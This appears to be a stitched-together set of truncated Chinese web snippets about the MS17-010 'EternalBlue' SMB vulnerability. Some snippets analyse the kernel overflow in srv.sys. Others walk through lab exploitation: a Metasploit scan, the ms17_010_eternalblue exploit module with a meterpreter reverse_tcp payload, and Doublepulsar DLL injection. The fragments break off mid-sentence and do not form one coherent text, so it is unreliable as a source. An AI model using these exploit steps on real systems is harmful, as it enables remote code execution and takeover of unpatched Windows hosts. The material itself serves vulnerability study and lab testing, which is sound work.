近期重新分析了ms17-010漏洞,想写一个自己的工具。在重新分析的过程中,又发现了很多之前没有进行深究的问题,由于很多东西还没有弄明白,先记录一下自己的分析过程以及踩的坑,不由感慨漏洞分析和想要实际利用两者之间的差距确实挺大的。 环境: win7 sp1 32bits srv.sys 6.1.7601.17514 srvnet.sys 6.1.7601.17514 ...
可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。 2、使用MSF的永恒之蓝漏洞模块 打开MSF:msfconsole MSF每次打开都会有一个随机的界面,花里胡哨的,不过我喜欢 ~(~▽~)~ 搜索ms17-010 代码:search ms17_010 这里可以得到一些工具,其中 auxiliary/scanner/smb/smb_ms1...
use auxiliary/scanner/smb/smb_ms17_010 跑起来 检测显示,主机很可能易受 MS17-010 攻击! 3) 使用攻击模块进行攻击 use exploit/windows/smb/ms17_010_eternalblue 设置payload,这里用set payload windows/x64/meterpreter/reverse_tcp 要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload set...
EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。 漏洞分析 漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(内核的数据结构,Large Non-Paged Kernel...
MS17-010 "永恒之蓝"漏洞 2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。 5 月 12 日,不法分子通过改造"永
【漏洞分析】MS 17-010:NSA Eternalblue SMB 漏洞分析 环境 EXPLOIT: Eternalblue-2.2.0.exe TARGET: win7 sp1 32bits srv.sys 6.1.7601.17514 srvnet.sys 6.1.7601.17514 PATCH: MS17-010 漏洞原理 srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点:...
利用auxiliary/scanner/smb/smb_ms17_010脚本扫描判断目标是否存在ms17-010-永恒之蓝漏洞,这里以其中一个为例,当然也可以跳过445端口扫描,直接进行MS17-010漏洞扫描。 9、运行后,可以看到扫描结果,说明192.168.43.111可能存在MS17-010漏洞 10、接下来就是利用exploit/windows/smb/ms17_010_eternalblue脚本扫描刚才可能...
先用辅助模块auxiliary/scanner/smb/smb_ms17_010,检测目标系统是否存在这个漏洞 msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > options 查看需要设置那些参数,看required,如果下面是yes就必须设置 Module options (auxiliary/scanner/smb/smb_ms17_010): ...
该漏洞主要是利用smb1在处理一个结构体转换过程中,错误计算了大小,导致的溢出。Nasa的工具集的EternalBlue利用这个溢出,对后面相连的一个内存池做了覆盖,并利用堆喷射的技巧,精准覆盖了0xffdff000的可执行内存,这个内存本来是系统预留用于存储一些配置信息的(Win7x86中是这个地址,Win7x64中是0xffff...
使用Eternalblue进行MS17-010漏洞利用 接下来的设置大多使用默认值就行,需要注意的是在选择靶机操作系统时根据需要切换就行,这里我们选择1) WIN72K8R2,攻击模式选择 1) FB Eternalblue模块设置成功 完成上述步骤后使用Doublepulsar模块来上传我们上一步生成的payload完成漏洞利用,需要注意在配置时选择Rundll来进行dll注入,...